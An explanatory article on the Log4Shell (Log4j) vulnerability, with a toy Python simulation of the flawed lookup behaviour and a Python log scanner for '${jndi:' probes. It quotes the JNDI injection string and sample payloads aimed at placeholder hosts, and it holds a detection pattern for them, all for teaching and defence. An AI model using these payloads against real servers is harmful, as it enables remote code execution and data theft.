Did you know that within days of security researchers discovering a critical vulnerability known as Log4Shell in servers supporting the game Minecraft, attackers had made millions of attempts to exploit Log4j?
According to one team tracking its impact, the vulnerability is a potential threat to millions more applications and devices across the globe.
The Log4Shell vulnerability, which affects millions of machines, lies in Log4j, an obscure but very widely used piece of software. Log4j is used to record a variety of operations that occur behind the scenes in many different computer systems.
So what exactly is this seemingly benign piece of internet infrastructure, how can hackers take advantage of it, and what kind of havoc can it cause?
In this article, we’ll answer some FAQs about the Log4Shell vulnerability.
What exactly is Log4j?
Log4j is a piece of software that lets programmes keep track of their previous actions. Rather than reinventing a logging or record-keeping component each time they create new software, developers frequently reuse existing libraries like Log4j. It is available for free on the Internet and is extensively used, with a substantial chunk of Internet services relying on it.
Log4j keeps track of events, such as errors and ordinary system processes, and sends diagnostic messages to system administrators and users. It is open-source software provided by the Apache Software Foundation.
When you type in or click on a bad web link and get a 404 error message, that’s an example of Log4j at work. The web server hosting the domain of the link you tried to reach tells you that there is no such page, and it uses Log4j to log the occurrence for the server’s system administrators.
When did the original vulnerability in the Log4j library become known to experts?
The vulnerability was first disclosed to the Apache Software Foundation (an open-source organisation) by security researcher Chen Zhaojun of Alibaba, China’s largest e-commerce company. They identified the attack on servers hosting the game Minecraft. Following a more detailed forensic investigation, they revealed that attackers had discovered the hole earlier and had been using it for a while.
NIST recorded the vulnerability in the National Vulnerability Database as CVE-2021-44228. The Apache Software Foundation assigned it a CVSS severity rating of 10, the maximum possible.
The flaw allows remote code execution without authentication. Attackers can exploit it simply by inserting a short string such as ${jndi:ldap://[attacker URL]} into text that the application logs. The flaw has been found in the products of some of the most well-known technology companies, including AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft: Java Edition, Steam, and VMware.
How does it work?
Log4Shell exploits a Log4j feature that allows users to specify custom code inside log messages to control how they are formatted. For example, if a separate server holds a directory linking usernames to real names, this feature lets Log4j log not just the username behind each attempt to log in to the server but also the person’s real name. To do so, the server running Log4j has to communicate with the server that stores the real names.
Such code, however, can do far more than format log messages. A server controlled by a third party can hand Log4j software code that then performs a variety of tasks on the targeted machine. This opens the door to criminal operations such as stealing sensitive data, seizing control of the targeted system, and spreading malicious content to other users communicating with the affected server.
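To make this concrete, here is an added toy re-implementation (not Log4j’s own code) of lookup substitution in a log message: a `${...}` expression inside the logged text is evaluated by the logger itself, so untrusted input such as a username can steer what the logger does. The hardened variant never interprets lookups in the message text, which is the behaviour the fixed releases adopt. The lookup table, the `jndi:` handling and the placeholder host are all constructed for the example.

```python
import re

# Matches one ${name} lookup expression inside a log message.
LOOKUP = re.compile(r"\$\{([^{}]*)\}")

# Constructed stand-in for Log4j's built-in lookup providers (hostname, env, ...).
LOCAL_LOOKUPS = {"hostname": "app01", "env:APP_ENV": "prod"}

# Records the remote endpoints the vulnerable logger would try to contact.
CONTACTED = []


def resolve(expr: str) -> str:
    """Resolve one lookup expression the way the unpatched library would."""
    if expr.lower().startswith("jndi:"):
        # The dangerous path: the logger itself reaches out to the named
        # endpoint and trusts whatever comes back. Here we only record it.
        CONTACTED.append(expr[5:])
        return f"<remote result from {expr[5:]}>"
    # Unknown lookups are left in place, as Log4j does.
    return LOCAL_LOOKUPS.get(expr, "${" + expr + "}")


def format_message(message: str, lookups_enabled: bool) -> str:
    """Vulnerable behaviour when lookups_enabled is True, hardened when False.

    The hardened branch mirrors the fixed releases, where message text is no
    longer scanned for lookups at all, so nothing in user input is interpreted.
    """
    if not lookups_enabled:
        return message
    return LOOKUP.sub(lambda m: resolve(m.group(1)), message)


def log_login_failure(username: str, lookups_enabled: bool) -> str:
    """Simulates a web app logging an untrusted username taken from a request."""
    CONTACTED.clear()
    return format_message(f"login failed for {username} on ${{hostname}}",
                          lookups_enabled)


if __name__ == "__main__":
    # Constructed input in the shape the article quotes; the host is a placeholder.
    hostile = "${jndi:ldap://untrusted-host.example/x}"
    print(log_login_failure("alice", lookups_enabled=True))
    print(log_login_failure(hostile, lookups_enabled=True), CONTACTED)
    print(log_login_failure(hostile, lookups_enabled=False), CONTACTED)
```

The point to notice is that the same untrusted string is harmless text in the hardened path but a network request in the vulnerable one; no input filtering is involved in the fix.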
Log4j is all over the place
One of the primary problems is Log4Shell’s position in the software ecosystem. Because logging is a standard part of most applications, Log4j is widely used: it appears in a wide range of programmes, from software development tools to security products, and in cloud services such as Apple iCloud and AWS.
As a result, hackers have a wide range of targets to choose from, including ordinary people, service providers, source code developers, and even security experts. While large corporations like Amazon can swiftly patch their web services to prevent hackers from exploiting them, many other enterprises will take longer to do so, and some may not even realise they need to.
How do we mitigate the risks?
- Patch – The vendor has provided a patch, and customers are urged to update Log4j to version 2.17.0 where possible.
- Firewall – Outbound firewall rules on servers are an effective mitigation. Attackers hunting for susceptible log4j2 instances rely on the server making an outbound DNS lookup or connection to a host they control; if the server can perform such lookups freely, that callback will succeed. Although attackers may readily get around firewalls, blocking a server’s unnecessary outgoing connections can stop a real attack from completing.
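Even with outbound connections blocked, you still want to know who is probing you. The following added example (not from the original article) scans web server access logs in Combined Log Format for the `${jndi:` lookup marker the article describes, checking the request line, referer and user-agent after URL-decoding, and tallies attempts per source address. The log lines and the callback hostname are constructed placeholders.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Combined Log Format: ip ident user [time] "request" status size "referer" "agent"
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The lookup marker from the article, matched after URL-decoding so a
# percent-encoded copy in a request path is not missed.
JNDI_MARKER = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def find_jndi_attempts(log_text: str) -> list[dict]:
    """One record per line whose request, referer or user-agent carries a JNDI lookup."""
    hits = []
    for line in log_text.splitlines():
        m = ACCESS_LINE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the whole scan
        for field in ("request", "referer", "agent"):
            decoded = unquote(m.group(field))
            if JNDI_MARKER.search(decoded):
                hits.append({"ip": m.group("ip"), "time": m.group("time"),
                             "field": field, "value": decoded})
                break  # one record per line is enough for triage
    return hits


def attempts_by_ip(hits: list[dict]) -> dict:
    """Count probing attempts per source address, e.g. to prioritise blocking."""
    return dict(Counter(h["ip"] for h in hits))


# Constructed sample lines; the callback hostname is a placeholder, not an indicator.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example/a}"
198.51.100.4 - - [10/Dec/2021:14:02:12 +0000] "GET /index.html HTTP/1.1" 200 1042 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2021:14:02:13 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"
"""

if __name__ == "__main__":
    for hit in find_jndi_attempts(SAMPLE_LOG):
        print(hit["ip"], hit["time"], hit["field"], hit["value"])
    print(attempts_by_ip(find_jndi_attempts(SAMPLE_LOG)))
```

A 200 or 404 status says nothing about whether the probe worked, so treat every hit as a reason to confirm the Log4j version on that host rather than as proof of compromise.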